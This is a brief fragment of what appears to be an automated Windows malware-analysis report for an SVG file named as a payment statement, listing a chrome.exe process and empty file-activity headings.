Analysis Process: chrome.exePID: 8168, Parent PID: 5260

General

File Activities

File Opened

File Created

File Deleted

File Moved

Windows Analysis Report
34209QB_EFT_Payment_Statemt25.svg